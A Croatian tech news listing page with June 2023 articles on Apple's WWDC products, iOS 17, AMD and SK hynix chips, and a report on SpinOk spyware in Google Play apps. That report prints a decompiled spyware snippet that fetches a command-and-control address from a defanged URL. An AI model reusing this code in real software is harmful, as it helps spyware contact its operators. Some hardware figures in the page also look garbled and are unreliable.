Samsung, Google i Qualcomm objavili rat Apple Visionu Pro

Datum objave 11.06.2023 - Sanja Ledinek

Samsung, Google i Qualcomm objavili rat Apple Visionu Pro

Samsung, Google i Qualcomm objavili rat Apple Visionu Pro

Samsung, Google i Qualcomm objavili rat Apple Visionu Pro

Samo koji dan nakon što je Apple objavio Vision Pro, klasu računalnih uređaja koji mogu integrirati digitalni svijet u stvarni svijet i kompatibilnih sa softverom za iOS i iPadOS, osvanula je vijest da Samsung, Google i Qualcomm razvijaju MR proizvod s ciljem lansiranja već ove godine.

Prema Business Korea, Google je odgovoran za razvoj operativnog sustava specifičnog za MR, Qualcomm za istraživanje i razvoj čipseta, a Samsung će lansirati MR hardverski proizvod. Zapravo, Sameer Samat, Googleov potpredsjednik za upravljanje proizvodima, izjavio je na Googleovoj godišnjoj konferenciji za razvojne programere u svibnju: “Uzbuđeni smo zbog naše nove suradnje sa Samsungom u imerzivnom XR prostoru (Extended Reality – krovni pojam za VR, AR i MR). Također je Samsung u veljači korejskom uredu za intelektualno vlasništvo podnio prijavu zaštitnog znaka za Galaxy naočale. Upućeni u industriju nagađaju da je njihov oblik više nalik običnim naočalama nego skijaškim, poput Vision Pro.

Ovo je prvi put da Android kamp udružuje snage za XR tržište. Vratimo li se u prošlost, Google je pokrenuo projekt Daydream 2016. godine kako bi razvio VR platformu za pametne telefone, ali je odustao od plana 2019. godine. Samsung je 2014. lansirao Gear VR slušalice s podružnicom Meta Oculus, ali od tada nije više bilo srodnih proizvoda.

Više... Vaš Komentar Top
SK hynix počeo masovnu proizvodnju 238-slojne 4D NAND flash memorije i ponovno probija ograničenja

Datum objave 11.06.2023

SK hynix počeo masovnu proizvodnju 238-slojne 4D NAND flash memorije i ponovno probija ograničenja

SK hynix počeo masovnu proizvodnju 238-slojne 4D NAND flash memorije i ponovno probija ograničenja (1)

Južnokorejski proizvođač memorije SK hynix objavljuje je da su započeli masovnu proizvodnju 238-slojne 4D NAND flash memorije i provodi provjeru proizvoda s tvrtkama kupcima koje proizvode pametne telefone.

Nova 238-slojna NAND flash memorija SK hynixa, kao najmanji čip na svijetu, ima povećanje učinkovitosti proizvodnje za 176 posto u usporedbi s prethodnom generacijom od 34 slojeva, a troškovna konkurentnost uvelike je poboljšana. Brzina prijenosa podataka ovog proizvoda je 2,4 Gbit/s što je opet 50 posto brže od prethodne generacije 176-slojnog TLC nanda.

SK hynix počeo masovnu proizvodnju 238-slojne 4D NAND flash memorije i ponovno probija ograničenja (2) SK hynix počeo masovnu proizvodnju 238-slojne 4D NAND flash memorije i ponovno probija ograničenja (3)

PROČITAJTE JOŠ

SK Hynix kupuje Intelov odjel NAND i SSD memorije i uređaje

SK Hynix masovno proizvodi 18 GB LPDDR5 RAM za mobitele

Također su poboljšane performanse čitanja i pisanja za oko 20 posto. Uz to, potrošnja energije pri čitanju podataka pala je za 21 posto. SK hynix planira proširiti opseg na PCIe 5.0 SSD- solid-state pogone (SSD) i SSD proizvode velikog kapaciteta klase podatkovnog centra.

Više... Vaš Komentar Top
Serija Ryzen 8000 u prvoj fazi testiranja

Datum objave 11.06.2023

Serija Ryzen 8000 u prvoj fazi testiranja

Serija Ryzen 8000 u prvoj fazi testiranje_0

S AMD Ryzen 7000 procesorima smo se službeno susreli prošle godine, a sada nam je u fokusu nova generacija temeljena na arhitekturi Zen 5 koja bi na tržištu trebala osvanuti 2024. godine. Za sada ima niz zanimljivih informacija o Ryzen 8000 seriji, uključujući specifikacije serije predmemorije i IPC performansi. Izvor je poznati RedGamingTech.

Najmoćniji procesori serije AMD Ryzen 8000 koristit će i dalje 16 jezgri i 32 niti, još uvijek s dizajnom dva CCD-a. Takt procesora bi mogao dosegnuti 6 GHz, a TDP ostaje na 170 W. L1 predmemorija penje se na 80 KB po jezgri, što i nije preveliko povećanje u odnosu na dosadašnjih 64 KB jer je predmemorija izuzetno skupa i nije lako povećati kapacitet. L2 i L3 taktovi ostaju isti.

Serija Ryzen 8000 u prvoj fazi testiranje_2 Serija Ryzen 8000 u prvoj fazi testiranje-1

Prvi uzorci se već testiraju i pojavili se u bazi podataka, ali imaju još uvijek 8 jezgri i 16 niti. Naime, Benchleaks, je pronašao nepoznate AMD procesore u Einstein@Home i LHC@home bazama podataka. Prema ovim bazama, novi AMD čip prikazan je kao “100-000001290-11_N”

Osim Zen 5 CPU-a, još su dva nepoznata grafička procesora se koriste za testiranje. Jedan je Radeon RX 16 GRE sa 7900 GB video memorije, a drugi je čip serije Radeon RX s 12 GB video memorije. Vjerojatno su namijenjeni nadolazećoj grafičkoj kartici, a prema kapacitetu memoriji to bi trebala biti Radeon RX 7700. Budući da su informacije o Zen 4 CPU i Threadripper seriji pronađeni na isti način, vjerodostojnost je prilično visoka.

Više... Vaš Komentar Top
iOS 17 – niz novih značajki ali ipak ne za sve iPhone

Datum objave 11.06.2023

iOS 17 - niz novih značajki ali ipak ne za sve iPhone

iOS17

Appleova službena verzija za iOS 17 trebala bi biti dostupna za preuzimanje na jesen. Bit će nadograđeno 20 modela počevši od iPhone 11 serije do iPhone 14 serije te iPhone XS, XS Max, XR i iPhone SE(2 i 3) uređaji. iOS 17 donosi niz novih značajki, ali neće ih moći koristiti baš svi modeli u potpunosti zbog hardverskih ograničenja. Slijede detalji.

iOS 17 nastavlja u stilu prethodne generacije. Dodano je sučelje pozivatelja Contact Posters posvećeno adresaru i kontaktima. Jednostavno rečeno, možete koristiti unificirani i visoko prilagođeni stil za dizajn svakog kontakta u adresaru. Uz takozvanu NameDrop funkciju, ovi kontakti se mogu izravno podijeliti dodirivanjem dva uređaja. Naravno, ne samo s iPhone, već i Apple Watch.

iOS17_poruke

U aplikaciji Poruke, prije svega, dodano je polje za pretraživanje za filtriranje ili pronalaženje željenih informacija. Što se tiče glasovnih poruka, nudi se mehanizam za pretvaranje glasa u tekst kao odgovor na metodu strojnog učenja, tako da je prvo moguće provjeriti poruku i potom odlučiti odgovoriti na nju ili ne, ako je nezgodno javiti se na telefon. Na FaceTime strani je dodana funkcija Live Voice. Jednostavno rečeno, možete snimiti jednostavan kratki video kao poruku.

iOS17_prijava

Još jedna važna funkcija je Prijava. Pomoću ove funkcije moguće je obavijestiti svoje članove obitelji, prijatelje ili poslovnog partnera da ste sigurno stigli na određeno mjesto. Ali, što ako kasnite? To je sljedeća funkcija. Bit će prikazana lokacija uređaja i druge informacije u sučelju osoba koje imate prijavljene, tako da ako postoji stvarna opasnost, možete dobiti pomoć čim moguće.

iOS17_razmjena adresara iOS17_posjetnica sa satom

“Izvanmrežna karta” vrlo je korisna funkcija na Google kartama od kada je pokrenuta 2012.godine, jer mape se mogu preuzeti unaprijed kako se ne bi trošio podatkovni promet u Roamingu ili ako dođe do nekih problema s mrežom. Napokon, Apple Maps drži ovaj korak s Androidom. Očekuje se da će ova funkcija izvanmrežne karte biti na jesen dostupna ne samo iPhone, već za iPadOS 17, watchOS 10.

Automatsko zamagljivanje golišavih fotografija:  Appleova značajka AirDrop prilično je korisna. Apple uređaji mogu slati fotografije jedni drugima, ali posljednjih godina bilo je mnogo vijesti o tome da se koriste kao alat za slanje nepristojnih fotografija i uznemiravanje. Novi sustav posebno jača funkciju privatnosti, u kojoj će se takav i sličan osjetljiv sadržaj automatski identificirati, bit zamagljen ili se reproducirati kao mozaik, a korisnike upozoravati da funkcija nije primjenjiva AirDrop, razmjenu poruka, FaceTime, postere za telefonske kontakte itd. Podržane su čak i aplikacije trećih strana. Uz to, neće se događati situacija da će prijenos biti prekinut kada se prekorači udaljenost jer će mreža preuzeti i nastaviti prijenos bez gubitaka.

iOS17_aird drop

Aplikacija Kamera ima niz poboljšanja uključujući obrezivanje jednim dodirom, prepoznavanje kućnih ljubimaca, stvaranje animiranih naljepnica i vizualno traženje recepata iz fotografija itd.  Jedno od zanimljivih odnosi se na Grid način koji je dosada omogućio prikaz devet-kvadratne rešetke za podešavanje i imao donekle skrivenu značajku izravnavanja fotografija odozgo prema dolje ( lebdeći križić), S iOS-om 17, Apple poboljšava ovu funkciju odvajajući je od Grid moda u vlastitu opciju i proširujući na vodoravnu razinu. Uključivanjem, ako iPhone osjeti da je nagnut izvan vodoravnog položaja, pojavit će se bijela isprekidana vodoravna linija na zaslonu. Pretvara se u žutu nakon što se uređaj poravna. Funkcija nije nametljiva, jer se skočni prozor za niveliranje pojavljuje samo nakratko i unutar uskog raspona.

PROČITAJTE JOŠ

Apple M2 Max i M2 Ultra donose moćnu snagu u novi Mac Studio i Mac Pro

Apple Vision Pro je konačno stigao

Zašto je iPhone još mnogima prvi izbor i lojalnost Appleu vrlo visoka

Ovo su funkcije iOS 17 sustava koje neće biti dostupne svim iPhone uređajima

Način čekanja: Jedna od značajki je novi način rada “stanja pripravnosti, mirovanja, čekanja… ” koja je privukla znatnu pažnju u iOS-u 17. Može omogućiti iPhoneu da postane pametni zaslon prilikom punjenja, kontinuirano prikazujući sat, kalendar i fotografije, baš kao i Googleov Nest Hub.

Ako noću se aktivira ovo stanje mirovanja, zaslon će se automatski prilagoditi kako bi sličio načinu noćnog gledanja Apple Watch Ultra s crvenim slovom i crnom pozadinom, smanjujući nelagodu. Međutim, ova se funkcija ne može koristiti čak ni za iPhone 14 i 14 Plus, već je ekskluzivna samo za 2 modele: iPhone 14 Pro i 14 Pro Max. I, naravno, postolje je potrebno kupiti zasebno. Osim toga, Apple je dodao Reakcije na FaceTime videopozive, koji mogu dati 3D sheme poput srca, balona i vatrometa, kao i “automatsku korekciju” koja će provjeriti ima li tipfelera. Dostupno je samo za modele iznad serije iPhone 12.

iOS17_stanje čekanja

iOS 17 također dodaje praktičnije funkcije za osobe s invaliditetom, među kojima je pomoći slijepim ili slabovidnim osobama da čitaju tekst dodirima prstiju itd., ali podržani su samo iPhone modeli s LiDAR skenerom, što znači iPhone 12 Pro serija ili novija.

Eto, to je bio naš odabir. Na popisu promjena su još izrada vlastitih naljepnica, dodavanje posebnih efekte nakon uređivanja itd. Više detalja donosimo kada iOS 17 bude službeno dostupan, odnosno prvi uređaj nam pristigne na test.

Više... Vaš Komentar Top
294 Android aplikacije u Google Play trgovini imaju špijunski softver

Datum objave 11.06.2023

294 Android aplikacije u Google Play trgovini imaju špijunski softver

294 Android aplikacije u Google Play trgovini imaju špijunski softver-1

Teško je više pratiti koliko je zlonamjernih aplikacija uspjelo prodrijeti u Google Play trgovinu. Proteklih mjeseci bilo je nekoliko izvješća o zlonamjernim aplikacijama unutar trgovine. Zapravo, svaki tjedan prošlog mjeseca. Sada postoji novi popis zlonamjernih aplikacija koje mogu ukrasti dragocjene podatke, objavljuje Dr. Web.  Radi se  najmanje o 101 Android aplikaciji koja krši privatnost i ukupno imaju preko 400 milijuna preuzimanja sa službene trgovine Google Play. Ali, isti špijunski softver samo koji dan kasnije je pronađen u još 193 dodatne Android aplikacije.

Većina dolazi sa SpinOk spyware modulom. Iako naziv zvuči poput neke igrice, jedan je od najgorih zlonamjernih programa nedavno otkrivenih. Infiltrira se u Android telefone putem marketinških SDK-ova (Software Development Kits) koje čak i programeri aplikacija mogu prihvatiti kao nedužne.

Kod odgovoran za pribavljanje C&C adrese:

// s1 = https[:]//d3hdbjtb1686tn[.]cloudfront[.]net/gpsdk.html
httpURLConnection0 = CLS21213.openConnection(s1);
httpURLConnection0.setRequestMethod(“GET”);
if(httpURLConnection0.getResponseCode() == 200) {
Map map0 = httpURLConnection0.getHeaderFields();
if(map0 == null || (map0.isEmpty())) {
goto label_19;
}
s = (String)((List)map0.get(“x-origin”)).get(0);
Log.e((“host : ” + s));
goto label_17;
}

294 Android aplikacije u Google Play trgovini imaju špijunski softver-2

Cilj zlonamjernog softvera je prikupiti osobne podatke i datoteke od korisnika i koristiti u razne sumnjive svrhe. Nažalost, Google još nije uklonio većinu tih zlonamjernih Android aplikacija iz Trgovine Play. To znači dabroj potencijalnih žrtava može rasti. Čudno je vidjeti takvo kašnjenje, s obzirom na to da su ove aplikacije u više navrata označile razne tvrtke za cyber sigurnost. Dok se čeka službeni potez pretraživačkog diva, da biste se zaštitili, trebali biste izbrisati ove aplikacije sa svih uređaja s Androidom. Među njima su  razne igre, softver za uređivanje videa, iSecurity – Virus Cleaner; Vast VPN – Secure VPN Proxy,
Hello VPN-Fast & Secure , Bitcoin Master itd.

Puni opisi aplikacija nalaze  se na Dr.web i msn web stranicama.

Više... Vaš Komentar Top
Gaming brend White Shark dodjeljuje stipendiju

Datum objave 09.06.2023

Gaming brend White Shark dodjeljuje stipendiju

Algebra_WhiteShark-stipendija

Domaći gaming brend White Shark dodjeljuje punu stipendiju za sve četiri godine prijediplomskog studija razvoja računalnih igara na Algebri. Kriteriji za osvajanje stipendije su ispunjena zamolba za dodjelu stipendije, ocjene iz srednje škole koje moraju u ukupnom prosjeku biti najmanje 4.2 te predaja samostalnog projekta iz područja razvoja računalnih igara.

Algebra je nedavno predstavila svoj novi prijediplomski studij razvoja računalnih igara koji je osmišljen s ciljem pružanja suvremenih i tržišno konkurentnih znanja i vještina potrebnih za razvoj računalnih igara iz područja programiranja, stvaranja iskustva igranja, dizajna, produkcije, marketinga i poslovnog planiranja.

Kandidati koji žele sudjelovati na stipendijskom natječaju moraju do 1. srpnja 2023. na adresu stipendija@algebra.hr poslati zamolbu te tražene dokumente, a više informacija dostupno je na Algebrinim službenim stranicama.

Više... Vaš Komentar Top
Apple M2 Max i M2 Ultra donose moćnu snagu u novi Mac Studio i Mac Pro

Datum objave 08.06.2023

Apple M2 Max i M2 Ultra donose moćnu snagu u novi Mac Studio i Mac Pro

Apple-WWDC23-Mac-Pro-M2-Ultra-Mac-Studio-M2-Max-M2-Ultra

Apple je službeno lansirao Mac Pro i Mac Studio opremljen M2 Max i novim moćnim M2 Ultra čipsetima ( druge generacije 5nm procesne tehnologije). U osnovi, bilo da se radi o Mac Studio ili Mac Pro, svi slijede dizajn izgleda prethodnih modela.

Mac Studio

Mac Studio opremljen s M2 Max čipom. Ima 12-jezgreni CPU, 38 jezgri GPU-a, kao i objedinjenu memoriju do 96 GB propusnosti 400 GB u sekundi što omogućuje dizajnerima koji koriste After Effects izvođenje grafičkih operacija brzinom većom do 50 posto u odnosu na sadašnji model.

Što se tiče Mac Studio modela  s M2 Ultra ima 24-jezgreni CPU (16 jezgri performansi + 8 jezgri energetske učinkovitosti, do 76-jezgreni GPU. Kao i njegov prethodnik usvaja UltraFusion tehnologiju prilagođenog pakiranja u industriji koja koristi silikonski interposer za povezivanje dva čipa s više od 10 000 signala pružajući 2,5 TB/s međuprocesorske propusnosti niske latencije. Na temelju toga, M2 Ultra ima objedinjenu memoriju od 192 GB s 800 GB/s propusnosti. Integrirana računalna AI snaga je iznad 31 TOPS.  Sve to omogućuje onima koji koriste Octane da renderiraju slike do 3 puta brže, a također omogućuje u DaVinci Resolveu povećanje brzinu obrade videa za oko 50 posto.

Novi Mac Studio podržava do šest Pro Display XDR vanjskih zaslona. Osim toga, koristi WiFi 6E i Bluetooth 5.3 tehnologiju bežičnog prijenosa. Postoje četiri Thunderbolt 4 priključka na stražnjoj strani, 10Gb Ethernet i poboljšani HDMI , kao i dva USB-A. Na prednjoj su strani dva USB-C priključka i utor za SD karticu.

Mac Pro

Mac Pro, stolno računalo, je nakon četiri godine dobio M2 Ultra čip, šest akceleratorskih kartica i time postao najsnažnije stolno računalo u seriji, a prijelaz Maca na Apple silicij završen. Nije iznenađenje, jer u usporedbi Core i9-13900KS s tradicionalnom x86 arhitekturom, znatno je moćniji, u pogledu propusnosti memorije, GPU računalne snage, 8K video streaming, sposobnost pokretati šest 5K zaslona itd.

Opremljen je sa sedam PCIe utora od kojih je šest otvorenih za proširenje PCIe Gen4 x4 specifikacije.

Od audio profesionalaca koji trebaju karticu za digitalnu obradu signala (DSP), do video profesionalaca koji trebaju I/O karticu sa serijskim digitalnim sučeljem (SDI) za povezivanje kamera i monitora, pa do korisnika koji trebaju dodatnu mrežnu povezanost i prostor za pohranu, svi mogu prilagoditi i proširiti svoje sustave.

Uz to ima osam Thunderbolt 4 priključaka (šest na stražnjoj strani i dva na vrhu) i podržava do šest vanjskih Pro Display XDR-ova, Wi-Fi 6E i Bluetooth 5.3 tehnologiju bežičnog prijenosa. Dodana su tri USB-A priključka, dva HDMI koji podržavaju razlučivost do 8K i brzinu osvježavanja slike do 240 Hz, dva Ethernet od 10 Gb i jedan za slušalice visoke impedancije.

Prednarudžbe za Mac Studio su počele, a cijena verzije opremljene M2 Max čipom je 1999 dolara.

Više... Vaš Komentar Top
Apple Vision Pro je konačno stigao

Datum objave 08.06.2023

Apple Vision Pro je konačno stigao

Apple Vision Pro je konačno stigao (1)

Dugo je vremena cijela industrija gledala na Apple kao na mjerilo i objekt koji treba slijediti. Iako su posljednjih godina kritizirani zbog pada inovacija i bez konkurentske prednosti u odnosu na Android tabor. Ali s Vision Pro AR uređajem mogli bi žestoki kritičari sada i ublažiti retoriku.

Vision Pro dizajniran je za spajanje digitalnog sadržaja s fizičkim prostorima. Apple za ovaj proizvod nije definirao radi li se o VR, AR ili XR, već ga je nazvao “uređaj za prostorno računanje”, a više od 5.000 patenata govori da nije predodređen da bude jednostavan.

Dolazi u monolitnom kućištu s okvirom aluminijske legure, poliranim laminiranim staklom, elastičnom pletenom trakom za glavu i mehanizmom za jednostavnu promjenu veličine, elastičnim trakama koje osiguravaju da zvuk ostane blizu ušiju i “digitalni gumbom” kako bi se omogućila kontrola razine stvarnosti ili uranjanja u “prostorno okruženje”.

Prilagođeni MicroLED zaslon nudi 23 MP piksela po oku, što je više od 4K. Za njegovo upravljanje ne postoji fizički kontroler. Sve što treba učiniti je koristiti geste, pokrete očiju i glasa! Dvanaest kamera i višestruki infracrveni senzori otkrivaju suptilne pokrete ruku, kontrola očiju osjeća smjer vida kao što je gledanje u određeni prozor na nekoliko sekundi. Naravno, zvučni dio je Siri koja pomaže u obavljanju gotovo svih funkcija.

Apple Vision Pro je konačno stigao (2)

Vision Pro ima i prvu Appleovu 3D kameru koja korisnicima omogućuje snimanje, ponovno stvaranje i uranjanje u omiljene fotografija i video zapise uz prostorni zvuk podržan Appleovim najnaprednijim Spatial Audio sustavom.

Vrhunac je najnovija tehnologija EyeSight koja donosi mogućnost da korisnik ostane povezani s ljudima oko sebe. To znači da dok je korisnik uronjen u virtualni prostor i netko iz vanjskog svijeta uđe u perspektivu uređaja šalju se prema van vizualni znakovi koji pokazuju na što je usredotočen, dok na zaslonu slika postaje prozirna kako bi se vidjela ta osoba.

Ukratko, uz Apple Vision Pro, korisnici mogu imati beskonačno platno, postavljati aplikacije po želji, povećavati i smanjivati, pregledavati web u Safariju, stvarati obveze u Notesu, održavati sastanke s kolegama u FaceTimeu, povezivati se s Macom itd.

Hardver

Hardverska osnova je M2 čip u kombinaciji novog čipa R1 za obradu ulaznog signala i prijenos slika na zaslon s iznimno niskom latencijom. Vrijedno je spomenuti tehnologiju Optic ID, siguran sustav autentifikacije koji koristi jedinstvenost šarenice.

Mora se reći da Apple Vision Pro nije savršen. Vrlo očita stvar je da može izdržati samo 2 sata s baterijom, pogotovo dok se koristi, životni vijek baterije sigurno će se skratiti, što će utjecati na korisničko iskustvo.

VisionOS

Operativni sustav je VisionOS. Osnovan je na sustavima macOS, iOS i iPadOS. Prvi je prostorni operativni sustav s 3D sučelje na svijetu, koji korisnicima omogućuje interakciju s digitalnim sadržajem kao da entitet sadržaja postoji u prostoru korisnika. Izgleda prilično slično bilo kojoj drugoj platformi za virtualnu stvarnost. Može pokretati Adobe Lightroom, Microsoft Teams i Zoom. Osim toga, operativni sustav postavljen je za pokretanje određenih obrazovnih aplikacija.

Što se tiče podrške ovom sustavu, Apple programerima daje cijeli set razvojnih kompleta i očekuje daljnju podršku tvrtki za softverske aplikacije trećih strana. Nema sumnje da će programeri s bilo koje strane dati sigurno sve od sebe jer Apple je dalje jamstvo prodaje. Ukratko, pozornica je postavljena i ovisi o inspiraciji programera.

Više... Vaš Komentar Top
macOS 14, iPadOS 17 i watchOS 10 – ključne značajke

Datum objave 08.06.2023

macOS 14, iPadOS 17 i watchOS 10 - ključne značajke

WWDC 2023 MacBook Air_naslovnica

Apple je na ovogodišnju gozbu za programere donio pet velikih ažuriranja sustava uključujući iOS 17, iPadOS 17, macOS 14, tvOS 17, watchOS 10 i novi visionOS.
Gledajući u cjelini,   sve više  se približavaju  Androidu u nekim osnovnim funkcijama i povećava  im se  udio widgeta u dizajnu sučelja.

 MacOS Sonoma

Apple-WWDC23-macOS-Sonoma-Widgets-230605_big.jpg.large

Nova verzija macOS-a nosi kodno ime Sonoma.  U kupna upotreba je sličnija iPhoneu, a dizajniran je za hibridni rad ali i za zabavu i igranje. Prva novost je da  widgeti  više nisu  samo u padajućem izborniku  već se također mogu povući izravno iz centra za obavijesti na radnu površinu i  postavljeni bilo gdje.  Uz to su interaktivni,  dostupni u posebnoj galeriji i  lijede kada je prozor aplikacije otvoren.  Macovi mogu koristiti i widgete s iPhonea  sve dok je telefon blizu  računala  ili povezan na istu Wi-Fi mrežu.

Što se tiče “inherentnog dojma” da se na Macovima ne mogu igrati igre, Apple se stvarno potrudio to  poboljšati. Pokrenuli su novi način igre, GameMode, kako bi skratili kašnjenje dodataka kao što su ručke i AirPods slušalice ,  te korisnicima pružili bolje iskustvo igranja.  Kao i u svijetu Androida, daje se igrama prioritet za CPU i GPU resurse.  Uz Game Porting ToolKit, programeri mogu jednostavno prenijeti svoje naslove s drugih platformi.

Nadalje, macOS Sonoma uvodi nova poboljšanja za video pozive. Korisnici mogu prikazati feed svoje web kamere na vrhu zajedničkog zaslona, ​​držeći korisnika u vidnom polju tijekom prezentacije. To se može učiniti u malom mjehuriću ili u velikom prikazu.

Kod video konferencija, način preklapanja ističe korisnika koji predstavlja svoj rad prikazujući ga preko dijeljenog sadržaja, a kada kamera prepozna određene geste, automatski dodaje neki efekt. Dijeljenje zaslona iskorištava snagu i izvedbu Appleovog čipa za daljinski pristup s niskom latencijom zvuka, velikom brzinom sličica u sekundi i podrškom za referentne boje.

Preglednik Safari također dobiva nove značajke s naglaskom na sigurnost. Privatni način sada zaključava prozore preglednika kada se ne koristi. Isti način također blokira tragače i automatski uklanja tragače iz URL-ova. Na popisu specifikacija su i profili ( privatni, poslovni…) u koje se mogu instalirati zasebne ekstenzije. Konačno, preglednik dobiva web aplikacije, koje omogućuju korištenje web stranica kao svojevrsnih zasebnih aplikacija. Te se aplikacije mogu dodati na dockove i dobiti vlastitu bočnu traku.

Od ostalih noviteta tu su mogućnost povezivanja slušnih pomagala, pauziranje GIF-ova u porukama i Safariju, prilagođavanje teksta u Mac aplikacijama,
ispunjavanje obrazaca s AutoFill, mogućnost pregledavanja PDF-ova u Notesu,  stvaranja grupe za dijeljenje nekih lozinki, nove naljepnice, pametni popisi za kupnju itd.

Javna beta verzija bit će pokrenuta sljedeći mjesec, a potpuno izdanje stiže na jesen. Vjerojatno u listopadu.

iPadOS 17

iPad OS 17 (2)

Appleova nadogradnja na iPadOS 17 ove je godine relativno mala. Zaslon iPada dalje dodaje prilagođene postavke, dinamički dio prikaza u stvarnom vremenu, nove efekte prijelaza, nudi dosta stilova za odabir, a zadani se temelji na 9 planeta. Fontovi koji se odnose na datume također imaju prilično visok stupanj slobode prilagodbe. Uz to može se staviti više grupa widgeta, kao što je prikaz vremena, napunjenosti baterije ili povezanih obavijesti. Apple je također učinio iPadove desktop gadgete interaktivnijima, i mogu se uključiti/isključiti određene funkcije putem dodira.

Osim toga, iPad OS 17 također može izravno napraviti FaceTime video poziv, a sve zdravstvene aplikacije podržane na iPhoneu i Apple Watchu, dostupne su na iPadu u iPadOS-u 17.

Što se tiče aplikacije Boundless Drawing, dodani su novi alati kao što su vodene boje, olovke i odgovarajući oblici. I funkcija praćenja koja može pratiti radnje drugih korisnika tijekom suradnje.

Od svih novosti ažuriranje sustava, jedna od najistaknutijih je podrška za PDF datoteke. Kroz strojno učenje, kada gledate PDF datoteku putem iPada, može savršeno otkriti opcije praznih polja u datoteci i omogućiti korisnicima da popune relevantne informacije ili bilješke. PDF datoteke također mogu surađivati s drugim aplikacijama, poput slanja drugima putem poruka, e-pošte itd.

Ojačana je i funkcija “front-screen scheduling”, dopuštajući iPadu da prilagodi veličinu i položaj svakog prozora, a Apple naglašava da je fleksibilnost bolja od prethodne generacije iPadOS-a 16.

Dobra vijest je da se aplikacija  Zdravlje pridružila iPadu ,  a  fitnes  podaci  konačno se mogu sinkronizirati na mobilnim telefonima i satovima.

iPadOS17 biti će službeno dostupan ove jeseni, a podržani modeli uključuju:

 • iPad Pro (druge generacije i noviji)
 • iPad Air (treće generacije i noviji)
 • iPad (šeste generacije i noviji)
 • iPad mini (pete generacije i noviji)

watchOS 10

watchOS 10 (2)

watchOS 10 napravio je prilično veliku promjenu. Sučelje je promijenjeno s originalnog neovisnog rada aplikacija na prikaz i izgled rada koji je blizak ranoj Apple Watch widget metodi. Ovdje se također naziva Smartstack. Zadržava svoje digitalne brojčanike koji prikazuju vrijeme ili sat. Međutim, kako korisnici okreću digitalnu krunu, pojavljuje se novi ‘pametni niz’ widgeta za pregled više skupova informacija, poput vremenske prognoze, kalendara, grafikona aktivnosti itd., bez klikanja na aplikaciju. Dugi pritisak također može dodati widget tako da se ne mora otvoriti aplikacija za izvršiti operaciju.

Dodana su 2 seta brojčanika sata, odnosno palete boja koje se mijenjaju s vremenom i animirani brojčanik Snoopyja i Peanutsa. Oba koriste metode interakcije slične animaciji i ne samo da mogu komunicirati s kazaljkom na satu, već također odražavaju vremenske uvjete.

Nadalje, način na koji se gumbi koriste mijenja se u watchOS-u 10. Kontrolni centar otvara se bočnim gumbom. Duplim klikom na digitalnu krunicu korisnici se vraćaju na nedavno korištenu aplikaciju.

Razne watchOS aplikacije također dobivaju novi izgled, s kojim bolje iskorištavaju površinu zaslona.

Aplikacija kompas nakon otvaranja automatski će dodati dvije međutočke, od kojih će jedna prikazati lokaciju na kojoj je telefon posljednji put primio signal, tako da se može vratiti i uspostaviti kontakt kada ponovno bude u opasnosti. Osim toga, podržava novu metodu prikaza nadmorske visine, koja se može vidjeti u 3D.

Isto tako aplikacija karte, biti će puna novih značajki koje pružaju konturne linije, renderiranje terena, nadmorsku visinu, pa čak i staze.
Što se tiče sportskog dijela, prije svega, za bicikle, ovaj put watchOS 10 može se povezati s Bluetooth dodacima senzora za bicikle, tako da se snaga i ritam vožnje bicikla mogu detektirati u satu, a također se mogu prikazati povezani grafikoni. Osim toga, što je još važnije, s novim vrijednostima snage, otkucaja srca i vježbanja može se izračunati funkcionalni prag snage (FTP) poznat svima u biciklističkoj industriji, a povezan je s prethodnim trčanjem, produžujući šest intervala.

Osim toga, po prvi put WatchOS također uvodi mentalno zdravlje u zdravstvenu aplikaciju. Korisnici mogu bilježiti svoje trenutne osjećaje i mentalno stanje te davati prijedloge kroz dugoročne podatke.

Zdravlje vida također je točka na koju je Apple konačno obratio pozornost. Sat sada može brojati vrijeme provedeno vani tijekom dana (kroz senzor svjetla) kako bi procijenio korištenje očiju korisnika, a također je dodao funkciju mjerenja udaljenosti zaslona na uređajima kao što je iPad. Ako je korisnik preblizu zaslona, pojavljuje se obavijest da se obrati pažnja na udaljenost.

Očekuje se da će watchOS10 biti službeno predstavljen ove jeseni, a podržani modeli uključuju:

 • Apple Watch Series 4
 • Apple Watch Series 5
 • Apple Watch SE
 • Apple Watch Series 6
 • Apple Watch Series 7
 • Apple Watch Series 8
 • Apple Watch Ultra
Više... Vaš Komentar Top
WWDC 2023: MacBook Air

Datum objave 08.06.2023

WWDC 2023: MacBook Air

WWDC 2023 MacBook Air (1)

Apple je na Worldwide Developers Conference lansirao novi 15-inčni MacBook Air debljine samo 11.5 milimetara što ga čini najtanjim prijenosnim računalom na tržištu. Srednji je to model u trenutnoj seriji Appleovih prijenosnih računala.

Izgled Apple MacBook Air 15 je očekivan. Nasljeđuje dizajn 13-inčnog uvelike promijenjenog prošle godine. Koristi 100% reciklirani aluminijski metalni materijal sa zaobljenim rubovima u bojama: srebrnoj, svemirsko sivoj, ponoćno crnoj i zvjezdanog neba. Ima sustav sa šest zvučnika s dva visokotonca i dva niskotonca s potiskivanjem vibracija, te podržava prostornu audio tehnologiju. Na lijevoj i desnoj strani su dva prijenosna priključka Thunderbolt 4 i 3,5 mm ulaz za slušalice. Usvaja standardnu Magic Keyboard tipkovnicu i touchpad velike veličine, te održava Touch ID i magnetski MagSafe 3.

Njegov 15,3-inčni IPS Liquid Retina zaslonon pruža maksimalnu nativnu rezoluciju od 2.560 x 1.664 piksela i usvaja 5 mm uski dizajn okvira, P3 raspon boja te svjetlinu do 500 cd/m² Na vrhu zaslona je 1080p Face Time videokameru s nizom od tri mikrofona.

Novi MacBook Air 15 je opremljen čipovima serije Apple M2, koji su konfigurirani s 8-jezgrenim CPU-om i 10-jezgrenim GPU-om do 24 GB objedinjene memorije i 2 TB SSD-a. U usporedbi s MacBook Airom opremljenim Intel procesorima u pogledu performansi povećanje je oko 12 posto, a donosi i do 18 sati trajanja baterije. Kako bi ovo prijenosno računalo bilo lagano (mase samo 1,24 kilograma) Apple također donosi dizajn bez ventilatora koji je isto kao i trenutni MacBook Air 13. Prema Appleu jedno punjenje baterije dostatno je ua ukupno 18 sati.

Ovaj model podržava funkciju releja iPhonea. Možete kopirati slike u telefonu i zalijepiti ih direktno u računalo, a također možete nastaviti koristiti neuređivane članke ili poruke u telefonu.

Konačno, u ponudi je i 13-inčni MacBook Air opremljen Apple M2 čipom, a službena cijena je od 1099 dolara. Cijena za 15 inčni model je 1299 dolara.

Više... Vaš Komentar Top

Forum

Objavljeno prije 4 minute

A1 - ex B.net

Objavljeno prije 41 minuta

Laptopi do 5000 kn

Objavljeno prije 43 minute

Biciklizam - savjeti za kupnju, popravci, dogovori za vožnje i ostalo

